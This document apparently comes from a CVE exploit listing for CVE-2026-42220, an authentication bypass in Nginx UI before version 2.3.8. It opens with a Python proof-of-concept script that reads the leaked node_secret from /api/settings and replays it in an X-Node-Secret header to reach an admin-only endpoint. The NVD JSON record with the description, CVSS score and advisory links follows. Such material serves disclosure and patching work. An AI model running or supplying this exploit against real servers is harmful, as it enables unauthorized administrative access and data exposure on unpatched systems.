CVE-2026-42220

import requests # Step 1: Authenticate as a low-privileged user session = requests.Session() # Assume we have valid credentials for a low-priv user login_payload = {"username": "lowpriv_user", "password": "password"} # login_resp = session.post("http://target/api/login", json=login_payload) # Step 2: Retrieve sensitive configuration settings_url = "http://target/api/settings" resp = session.get(settings_url) if resp.status_code == 200: data = resp.json() # The secret is exposed in the settings response secret = data.get("node_secret") if secret: print(f"[+] Exploit: Found node.secret -> {secret}") # Step 3: Use the secret to bypass AuthRequired as a trusted node headers = { "X-Node-Secret": secret } # Accessing a protected endpoint (e.g., admin only) target_url = "http://target/api/admin/config" exploit_resp = requests.get(target_url, headers=headers) if exploit_resp.status_code == 200: print("[+] Exploit Successful: Bypassed authentication!") print(exploit_resp.text) else: print("[-] Exploit Failed") else: print("[-] node.secret not found in response") else: print("[-] Failed to retrieve settings")

{"cve": {"id": "CVE-2026-42220", "sourceIdentifier": "[email protected]", "published": "2026-05-04T21:16:31.870", "lastModified": "2026-05-06T17:16:36.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, an authenticated user can call GET /api/settings and retrieve sensitive configuration values, including node.secret. The same node.secret is accepted by AuthRequired() through the X-Node-Secret header (or node_secret query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user. This issue has been patched in version 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.8", "matchCriteriaId": "FB1A4031-FD2F-49D7-8021-128BA057C4FA"}]}]}], "references": [{"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}